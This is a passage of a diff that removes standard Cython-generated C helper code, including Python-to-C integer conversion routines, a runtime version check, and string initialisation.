Py_True : Py_False))) goto limited_bad; - result = PyObject_Call(from_bytes, arg_tuple, kwds); - limited_bad: - Py_XDECREF(from_bytes); - Py_XDECREF(py_bytes); - Py_XDECREF(order_str); - Py_XDECREF(arg_tuple); - Py_XDECREF(kwds); - return result; -#endif - } -} - -/* FormatTypeName */ -#if CYTHON_COMPILING_IN_LIMITED_API -static __Pyx_TypeName -__Pyx_PyType_GetName(PyTypeObject* tp) -{ - PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, - __pyx_n_s_name); - if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { - PyErr_Clear(); - Py_XDECREF(name); - name = __Pyx_NewRef(__pyx_n_s__103); - } - return name; -} -#endif - -/* CIntFromPyVerify */ -#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ - __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) -#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ - __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) -#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ - {\ - func_type value = func_value;\ - if (sizeof(target_type) < sizeof(func_type)) {\ - if (unlikely(value != (func_type) (target_type) value)) {\ - func_type zero = 0;\ - if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ - return (target_type) -1;\ - if (is_unsigned && unlikely(value < zero))\ - goto raise_neg_overflow;\ - else\ - goto raise_overflow;\ - }\ - }\ - return (target_type) value;\ - } - -/* CIntFromPy */ -static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const long neg_one = (long) -1, const_zero = (long) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x))) { - if ((sizeof(long) < sizeof(long))) { - __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) - } else { - long val = 
PyInt_AS_LONG(x); - if (is_unsigned && unlikely(val < 0)) { - goto raise_neg_overflow; - } - return (long) val; - } - } else -#endif - if (likely(PyLong_Check(x))) { - if (is_unsigned) { -#if CYTHON_USE_PYLONG_INTERNALS - if (unlikely(__Pyx_PyLong_IsNeg(x))) { - goto raise_neg_overflow; - } else if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_DigitCount(x)) { - case 2: - if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { - return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - case 3: - if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { - return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - case 4: - if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { - return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - } - } -#endif -#if 
CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 - if (unlikely(Py_SIZE(x) < 0)) { - goto raise_neg_overflow; - } -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (long) -1; - if (unlikely(result == 1)) - goto raise_neg_overflow; - } -#endif - if ((sizeof(long) <= sizeof(unsigned long))) { - __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) -#endif - } - } else { -#if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_SignedDigitCount(x)) { - case -2: - if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 2: - if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case -3: - if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned 
long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 3: - if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case -4: - if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 4: - if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { - return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - } - } -#endif - if ((sizeof(long) <= sizeof(long))) { - __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(long) <= 
sizeof(PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) -#endif - } - } - { - long val; - PyObject *v = __Pyx_PyNumber_IntOrLong(x); -#if PY_MAJOR_VERSION < 3 - if (likely(v) && !PyLong_Check(v)) { - PyObject *tmp = v; - v = PyNumber_Long(tmp); - Py_DECREF(tmp); - } -#endif - if (likely(v)) { - int ret = -1; -#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) - int one = 1; int is_little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&val; - ret = _PyLong_AsByteArray((PyLongObject *)v, - bytes, sizeof(val), - is_little, !is_unsigned); -#else - PyObject *stepval = NULL, *mask = NULL, *shift = NULL; - int bits, remaining_bits, is_negative = 0; - long idigit; - int chunk_size = (sizeof(long) < 8) ? 30 : 62; - if (unlikely(!PyLong_CheckExact(v))) { - PyObject *tmp = v; - v = PyNumber_Long(v); - assert(PyLong_CheckExact(v)); - Py_DECREF(tmp); - if (unlikely(!v)) return (long) -1; - } -#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(x) == 0) - return (long) 0; - is_negative = Py_SIZE(x) < 0; -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (long) -1; - is_negative = result == 1; - } -#endif - if (is_unsigned && unlikely(is_negative)) { - goto raise_neg_overflow; - } else if (is_negative) { - stepval = PyNumber_Invert(v); - if (unlikely(!stepval)) - return (long) -1; - } else { - stepval = __Pyx_NewRef(v); - } - val = (long) 0; - mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; - shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; - for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { - PyObject *tmp, *digit; - digit = PyNumber_And(stepval, mask); - if (unlikely(!digit)) goto done; - idigit = PyLong_AsLong(digit); - Py_DECREF(digit); - if (unlikely(idigit < 0)) goto done; - tmp = 
PyNumber_Rshift(stepval, shift); - if (unlikely(!tmp)) goto done; - Py_DECREF(stepval); stepval = tmp; - val |= ((long) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(stepval) == 0) - goto unpacking_done; - #endif - } - idigit = PyLong_AsLong(stepval); - if (unlikely(idigit < 0)) goto done; - remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); - if (unlikely(idigit >= (1L << remaining_bits))) - goto raise_overflow; - val |= ((long) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - unpacking_done: - #endif - if (!is_unsigned) { - if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) - goto raise_overflow; - if (is_negative) - val = ~val; - } - ret = 0; - done: - Py_XDECREF(shift); - Py_XDECREF(mask); - Py_XDECREF(stepval); -#endif - Py_DECREF(v); - if (likely(!ret)) - return val; - } - return (long) -1; - } - } else { - long val; - PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); - if (!tmp) return (long) -1; - val = __Pyx_PyInt_As_long(tmp); - Py_DECREF(tmp); - return val; - } -raise_overflow: - PyErr_SetString(PyExc_OverflowError, - "value too large to convert to long"); - return (long) -1; -raise_neg_overflow: - PyErr_SetString(PyExc_OverflowError, - "can't convert negative value to long"); - return (long) -1; -} - -/* CIntFromPy */ -static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const int neg_one = (int) -1, const_zero = (int) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x))) { - if ((sizeof(int) < sizeof(long))) { - __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) - } else { - long val = PyInt_AS_LONG(x); - if (is_unsigned && unlikely(val < 0)) { - goto raise_neg_overflow; - } - return (int) 
val; - } - } else -#endif - if (likely(PyLong_Check(x))) { - if (is_unsigned) { -#if CYTHON_USE_PYLONG_INTERNALS - if (unlikely(__Pyx_PyLong_IsNeg(x))) { - goto raise_neg_overflow; - } else if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_DigitCount(x)) { - case 2: - if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { - return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - case 3: - if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { - return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - case 4: - if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { - return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - } - } -#endif -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 - if (unlikely(Py_SIZE(x) < 0)) { - goto raise_neg_overflow; - } -#else - { - 
int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (int) -1; - if (unlikely(result == 1)) - goto raise_neg_overflow; - } -#endif - if ((sizeof(int) <= sizeof(unsigned long))) { - __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) -#endif - } - } else { -#if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_SignedDigitCount(x)) { - case -2: - if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 2: - if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case -3: - if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) 
<< PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 3: - if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case -4: - if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 4: - if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { - return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - } - } -#endif - if ((sizeof(int) <= sizeof(long))) { - __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) -#endif - } - } - { - int val; - PyObject *v = __Pyx_PyNumber_IntOrLong(x); -#if PY_MAJOR_VERSION < 
3 - if (likely(v) && !PyLong_Check(v)) { - PyObject *tmp = v; - v = PyNumber_Long(tmp); - Py_DECREF(tmp); - } -#endif - if (likely(v)) { - int ret = -1; -#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) - int one = 1; int is_little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&val; - ret = _PyLong_AsByteArray((PyLongObject *)v, - bytes, sizeof(val), - is_little, !is_unsigned); -#else - PyObject *stepval = NULL, *mask = NULL, *shift = NULL; - int bits, remaining_bits, is_negative = 0; - long idigit; - int chunk_size = (sizeof(long) < 8) ? 30 : 62; - if (unlikely(!PyLong_CheckExact(v))) { - PyObject *tmp = v; - v = PyNumber_Long(v); - assert(PyLong_CheckExact(v)); - Py_DECREF(tmp); - if (unlikely(!v)) return (int) -1; - } -#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(x) == 0) - return (int) 0; - is_negative = Py_SIZE(x) < 0; -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (int) -1; - is_negative = result == 1; - } -#endif - if (is_unsigned && unlikely(is_negative)) { - goto raise_neg_overflow; - } else if (is_negative) { - stepval = PyNumber_Invert(v); - if (unlikely(!stepval)) - return (int) -1; - } else { - stepval = __Pyx_NewRef(v); - } - val = (int) 0; - mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; - shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; - for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { - PyObject *tmp, *digit; - digit = PyNumber_And(stepval, mask); - if (unlikely(!digit)) goto done; - idigit = PyLong_AsLong(digit); - Py_DECREF(digit); - if (unlikely(idigit < 0)) goto done; - tmp = PyNumber_Rshift(stepval, shift); - if (unlikely(!tmp)) goto done; - Py_DECREF(stepval); stepval = tmp; - val |= ((int) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if 
(Py_SIZE(stepval) == 0) - goto unpacking_done; - #endif - } - idigit = PyLong_AsLong(stepval); - if (unlikely(idigit < 0)) goto done; - remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); - if (unlikely(idigit >= (1L << remaining_bits))) - goto raise_overflow; - val |= ((int) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - unpacking_done: - #endif - if (!is_unsigned) { - if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) - goto raise_overflow; - if (is_negative) - val = ~val; - } - ret = 0; - done: - Py_XDECREF(shift); - Py_XDECREF(mask); - Py_XDECREF(stepval); -#endif - Py_DECREF(v); - if (likely(!ret)) - return val; - } - return (int) -1; - } - } else { - int val; - PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); - if (!tmp) return (int) -1; - val = __Pyx_PyInt_As_int(tmp); - Py_DECREF(tmp); - return val; - } -raise_overflow: - PyErr_SetString(PyExc_OverflowError, - "value too large to convert to int"); - return (int) -1; -raise_neg_overflow: - PyErr_SetString(PyExc_OverflowError, - "can't convert negative value to int"); - return (int) -1; -} - -/* CheckBinaryVersion */ -static unsigned long __Pyx_get_runtime_version() { -#if __PYX_LIMITED_VERSION_HEX >= 0x030B00A4 - return Py_Version & ~0xFFUL; -#else - const char* rt_version = Py_GetVersion(); - unsigned long version = 0; - unsigned long factor = 0x01000000UL; - unsigned int digit = 0; - int i = 0; - while (factor) { - while ('0' <= rt_version[i] && rt_version[i] <= '9') { - digit = digit * 10 + (unsigned int) (rt_version[i] - '0'); - ++i; - } - version += factor * digit; - if (rt_version[i] != '.') - break; - digit = 0; - factor >>= 8; - ++i; - } - return version; -#endif -} -static int __Pyx_check_binary_version(unsigned long ct_version, unsigned long rt_version, int allow_newer) { - const unsigned long MAJOR_MINOR = 0xFFFF0000UL; - if ((rt_version & MAJOR_MINOR) == (ct_version & MAJOR_MINOR)) - return 0; - if (likely(allow_newer && (rt_version 
& MAJOR_MINOR) > (ct_version & MAJOR_MINOR))) - return 1; - { - char message[200]; - PyOS_snprintf(message, sizeof(message), - "compile time Python version %d.%d " - "of module '%.100s' " - "%s " - "runtime version %d.%d", - (int) (ct_version >> 24), (int) ((ct_version >> 16) & 0xFF), - __Pyx_MODULE_NAME, - (allow_newer) ? "was newer than" : "does not match", - (int) (rt_version >> 24), (int) ((rt_version >> 16) & 0xFF) - ); - return PyErr_WarnEx(NULL, message, 1); - } -} - -/* InitStrings */ -#if PY_MAJOR_VERSION >= 3 -static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { - if (t.is_unicode | t.is_str) { - if (t.intern) { - *str = PyUnicode_InternFromString(t.s); - } else if (t.encoding) { - *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); - } else { - *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); - } - } else { - *str = PyBytes_FromStringAndSize(t.s, t.n - 1); - } - if (!*str) - return -1; - if (PyObject_Hash(*str) == -1) - return -1; - return 0; -} -#endif -static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { - while (t->p) { - #if PY_MAJOR_VERSION >= 3 - __Pyx_InitString(*t, t->p); - #else - if (t->is_unicode) { - *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); - } else if (t->intern) { - *t->p = PyString_InternFromString(t->s); - } else { - *t->p = PyString_FromStringAndSize(t->s, t->n - 1); - } - if (!*t->p) - return -1; - if (PyObject_Hash(*t->p) == -1) - return -1; - #endif - ++t; - } - return 0; -} - -#include <string.h> -static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { - size_t len = strlen(s); - if (unlikely(len > (size_t) PY_SSIZE_T_MAX)) { - PyErr_SetString(PyExc_OverflowError, "byte string is too long"); - return -1; - } - return (Py_ssize_t) len; -} -static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { - Py_ssize_t len = __Pyx_ssize_strlen(c_str); - if (unlikely(len < 0)) return NULL; - return __Pyx_PyUnicode_FromStringAndSize(c_str, len); -} -static CYTHON_INLINE PyObject*
__Pyx_PyByteArray_FromString(const char* c_str) { - Py_ssize_t len = __Pyx_ssize_strlen(c_str); - if (unlikely(len < 0)) return NULL; - return PyByteArray_FromStringAndSize(c_str, len); -} -static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { - Py_ssize_t ignore; - return __Pyx_PyObject_AsStringAndSize(o, &ignore); -} -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT -#if !CYTHON_PEP393_ENABLED -static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { - char* defenc_c; - PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); - if (!defenc) return NULL; - defenc_c = PyBytes_AS_STRING(defenc); -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - { - char* end = defenc_c + PyBytes_GET_SIZE(defenc); - char* c; - for (c = defenc_c; c < end; c++) { - if ((unsigned char) (*c) >= 128) { - PyUnicode_AsASCIIString(o); - return NULL; - } - } - } -#endif - *length = PyBytes_GET_SIZE(defenc); - return defenc_c; -} -#else -static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { - if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - if (likely(PyUnicode_IS_ASCII(o))) { - *length = PyUnicode_GET_LENGTH(o); - return PyUnicode_AsUTF8(o); - } else { - PyUnicode_AsASCIIString(o); - return NULL; - } -#else - return PyUnicode_AsUTF8AndSize(o, length); -#endif -} -#endif -#endif -static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT - if ( -#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - __Pyx_sys_getdefaultencoding_not_ascii && -#endif - PyUnicode_Check(o)) { - return __Pyx_PyUnicode_AsStringAndSize(o, length); - } else -#endif -#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && 
